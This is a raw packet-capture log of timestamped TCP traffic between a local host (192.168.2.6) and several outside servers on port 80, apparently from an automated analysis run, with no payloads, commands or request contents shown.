                                                                                                                                                        Dec 5, 2024 05:38:28.958313942 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.958417892 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.958465099 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.960813999 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.960916996 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.960957050 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.963308096 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.004148006 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.030795097 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.030812025 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.030879974 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.031008959 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.031019926 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.031080961 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.032008886 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.032131910 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.032177925 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.033561945 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.033576012 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.033637047 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.034995079 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.035598993 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.035639048 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.037233114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.037245035 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.037300110 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.038650036 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.038696051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.038753986 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.040400028 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.040491104 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.040537119 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.042135954 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.042241096 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.042285919 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.043848038 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.043957949 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.044001102 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.047836065 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.047847986 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.047864914 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.047892094 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.047998905 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.048044920 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.049490929 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.049648046 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.049691916 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.051038980 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.051342964 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.051389933 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.052833080 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.052973032 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.053014040 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.054469109 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.054481030 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.054584026 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.056124926 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.056138992 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.056184053 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.057569981 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.057743073 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.057789087 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.059165955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.059334993 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.059377909 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.060806036 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.060826063 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.060877085 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.062376976 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.062395096 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.062449932 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.063802004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.063966036 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.064011097 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.065361977 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.065375090 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.065418005 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.066821098 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.066951990 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.066988945 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.068356991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.068519115 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.068567038 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.069859028 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.070005894 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.070049047 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.071381092 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.071537018 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.071584940 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.072921991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.073101044 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.073143959 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.074404001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.074417114 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.074455976 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.075169086 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.076040983 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.076080084 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.077404976 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.077564955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.077608109 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.078676939 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.078854084 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.078897953 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.080082893 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.080244064 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.080290079 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.081454992 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.081753016 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.081798077 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.083044052 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.083055973 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.083103895 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.084428072 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.084593058 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.084640026 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.085807085 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.085977077 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.086016893 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.087255001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.087412119 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.087456942 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.088655949 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.088835001 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.088876963 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.090049982 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.090218067 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:29.090260029 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:29.142354012 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:51.517759085 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.637506008 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:51.637598038 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.643821001 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:51.763541937 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469074011 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469137907 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469150066 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469162941 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469204903 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469217062 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469228029 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469245911 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469295979 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469374895 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469384909 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469397068 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.469415903 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.469428062 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.589072943 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.589174032 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.589258909 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.593214035 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.644901991 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.661217928 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.661300898 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.661376953 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.665369987 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.665493965 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.665565014 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.673722029 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.673855066 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.673924923 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.682136059 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.682235956 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.682307959 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.690525055 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.690649986 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.690710068 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.699059963 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.699176073 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.699254990 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.707288027 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.709150076 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.709228039 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.715854883 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.716662884 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.716748953 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.724070072 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.724143982 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.724214077 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.732461929 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.732559919 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.732628107 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.764725924 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.764820099 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.764893055 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.768866062 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.816765070 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.853107929 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.853216887 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.853301048 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.855520964 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.855676889 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.855742931 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.860301018 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.860435009 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.860491037 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.863842010 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:53.863922119 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.865252972 CET4982180192.168.2.6208.91.197.27
                                                                                                                                                        Dec 5, 2024 05:38:53.984904051 CET8049821208.91.197.27192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:09.505909920 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.625624895 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:09.625833035 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.641791105 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:09.761511087 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:10.722471952 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:10.722549915 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:11.145047903 CET4986380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:11.264869928 CET80498633.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:12.166949987 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.286705971 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:12.286905050 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.298032999 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:12.417834044 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:13.388497114 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:13.388616085 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:13.801678896 CET4987080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:13.921509027 CET80498703.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:14.820044041 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:14.939855099 CET80498763.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:14.940047979 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:14.951198101 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:15.070985079 CET80498763.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:15.071167946 CET80498763.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:16.040246964 CET80498763.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:16.040313959 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:16.457608938 CET4987680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:16.577308893 CET80498763.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:17.476260900 CET4988680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:17.595980883 CET80498863.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:17.596091032 CET4988680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:17.603600025 CET4988680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:17.723298073 CET80498863.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:18.701617002 CET80498863.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:18.701653957 CET80498863.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:18.701813936 CET4988680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:18.704997063 CET4988680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:18.824677944 CET80498863.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:24.238675117 CET4990380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:24.358383894 CET80499033.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:24.358462095 CET4990380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:24.369544029 CET4990380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:24.489239931 CET80499033.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:25.455416918 CET80499033.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:25.456037998 CET4990380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:25.879597902 CET4990380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:25.999840021 CET80499033.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:26.897991896 CET4991080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:27.017761946 CET80499103.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:27.017859936 CET4991080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:27.028373003 CET4991080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:27.148566961 CET80499103.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:28.113518953 CET80499103.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:28.113586903 CET4991080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:28.535806894 CET4991080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:28.655653000 CET80499103.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:29.555136919 CET4991780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:29.674869061 CET80499173.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:29.674985886 CET4991780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:29.685472965 CET4991780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:29.806217909 CET80499173.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:29.806242943 CET80499173.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:30.770760059 CET80499173.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:30.770847082 CET4991780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:31.192059994 CET4991780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:31.311930895 CET80499173.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:32.210721016 CET4992380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:32.330605984 CET80499233.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:32.330681086 CET4992380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:32.336359978 CET4992380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:32.456049919 CET80499233.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:33.432655096 CET80499233.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:33.432806015 CET80499233.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:33.432873964 CET4992380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:33.435340881 CET4992380192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:33.555046082 CET80499233.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:38.760407925 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:38.880197048 CET8049940104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:38.881963015 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:38.892378092 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:39.012434006 CET8049940104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:40.396436930 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:40.435516119 CET8049940104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:40.435579062 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:40.437414885 CET8049940104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:40.437465906 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:40.516236067 CET8049940104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:40.516335011 CET4994080192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:41.413367033 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:41.533063889 CET8049947104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:41.533212900 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:41.541641951 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:41.661393881 CET8049947104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:43.051583052 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:43.087548018 CET8049947104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:43.087636948 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:43.088371992 CET8049947104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:43.088422060 CET4994780192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:43.171289921 CET8049947104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:43.171377897 CET4994780192.168.2.6104.21.31.249
